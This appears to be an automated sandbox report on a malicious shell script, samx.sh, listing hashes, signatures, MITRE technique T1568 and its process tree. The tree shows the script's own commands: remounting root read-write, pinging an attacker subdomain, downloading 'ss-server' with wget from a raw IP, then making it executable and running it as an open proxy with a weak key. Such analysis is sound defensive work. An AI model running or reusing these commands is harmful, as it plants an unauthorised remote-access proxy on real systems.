af2bc5dda7b0ae47a3ccd286afa17718b4e81daf944a8784e445e597dbbdcd28

Analysis

max time kernel
1030s
max time network
132s
platform
debian-9_armhf
resource
debian9-armhf-20221111-en
resource tags

arch:armhfimage:debian9-armhf-20221111-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
23-11-2022 15:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

samx.sh
Size

400B
MD5

6039cf7d6cc1378682e1a983fcaba7a8
SHA1

3ca4e29546ca125fd98429768ae0fd44182ccdee
SHA256

af2bc5dda7b0ae47a3ccd286afa17718b4e81daf944a8784e445e597dbbdcd28
SHA512

4119e1787b6edcc2639f0266308aea50891e67ea23404a060dd46bea082bc26033d8aafb93c06c084c391e141f838eacf21433cf94aabf1bf1e7b8e393504253

Score

8^/10

Malware Config

Signatures

Modifies hosts file 1 IoCs
Adds to hosts file used for mapping hosts to IP addresses.

Processes:

ping

description ioc process

/etc/hosts /etc/hosts ping
Writes DNS configuration 1 TTPs 2 IoCs
Writes data to DNS resolver config file.

Dynamic Resolution
T1568

Processes:

pingss-server

description ioc process

/etc/resolv.conf /etc/resolv.conf ping
/etc/resolv.conf /etc/resolv.conf ss-server
Reads runtime system information 3 IoCs
Reads data from /proc virtual filesystem.

Processes:

mountsedsed

description ioc process

/proc/filesystems /proc/filesystems mount
/proc/filesystems /proc/filesystems sed
/proc/filesystems /proc/filesystems sed
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.

Processes:

samx.shwget

description ioc process

/tmp/samx.sh /tmp/samx.sh samx.sh
/tmp/ss-server /tmp/ss-server wget

description	ioc	process
/etc/hosts	/etc/hosts	ping

description	ioc	process
/etc/resolv.conf	/etc/resolv.conf	ping
/etc/resolv.conf	/etc/resolv.conf	ss-server

description	ioc	process
/proc/filesystems	/proc/filesystems	mount
/proc/filesystems	/proc/filesystems	sed
/proc/filesystems	/proc/filesystems	sed

description	ioc	process
/tmp/samx.sh	/tmp/samx.sh	samx.sh
/tmp/ss-server	/tmp/ss-server	wget

/tmp/samx.sh
/tmp/samx.sh
1⤵
- Writes file to tmp directory
PID:374

/bin/sleep
sleep 120
2⤵
PID:375

/bin/mount
mount -no "remount,rw" /
2⤵
- Reads runtime system information
PID:402

/bin/ping
ping -c 4 samx-.subdomain.llzxs.com
2⤵
- Modifies hosts file
- Writes DNS configuration
PID:410

/usr/bin/wget
wget -P /tmp/ http://185.135.73.148:800/ss-server
2⤵
- Writes file to tmp directory
PID:411

/bin/sleep
sleep 10
2⤵
PID:445

/bin/chmod
chmod +x /tmp/ss-server
2⤵
PID:515

/bin/sed
sed "s/ /-/g"
1⤵
- Reads runtime system information
PID:405

/bin/grep
grep "inet addr"
1⤵
PID:408

/bin/sed
sed -r "s/ +inet addr:([0-9.]+) .+/\\1/g"
1⤵
- Reads runtime system information
PID:409

/tmp/ss-server
/tmp/ss-server -s 0.0.0.0 -p 8300 -m aes-256-cfb -k 123456
1⤵
- Writes DNS configuration
PID:517

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads